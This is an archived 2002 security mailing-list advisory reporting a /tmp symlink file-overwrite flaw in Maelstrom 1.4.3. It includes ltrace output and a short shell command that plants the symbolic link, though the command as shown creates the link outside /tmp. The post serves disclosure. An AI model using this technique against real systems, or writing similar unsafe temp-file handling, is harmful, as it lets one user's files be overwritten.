Maelstrom 1.4.3 abartity file overwrite

From: Andrew Griffiths (andrewgat_private)
Date: Sun Jan 20 2002 - 01:16:30 PST

Next message: Andrew Griffiths: "remote memory reading through tcp/icmp"

Previous message: Matthew Dent: "USPS Online Bill Pay - Cleartext Password Leakage"
Next in thread: Chris Gragsone: "Re: Maelstrom 1.4.3 abartity file overwrite"
Reply: Chris Gragsone: "Re: Maelstrom 1.4.3 abartity file overwrite"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made we wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user who ran
it.

Of course, this won't work on systems that have linking restrictions in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


--
www.tasmail.com

Next message: Andrew Griffiths: "remote memory reading through tcp/icmp"
Previous message: Matthew Dent: "USPS Online Bill Pay - Cleartext Password Leakage"
Next in thread: Chris Gragsone: "Re: Maelstrom 1.4.3 abartity file overwrite"
Reply: Chris Gragsone: "Re: Maelstrom 1.4.3 abartity file overwrite"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jan 20 2002 - 13:59:37 PST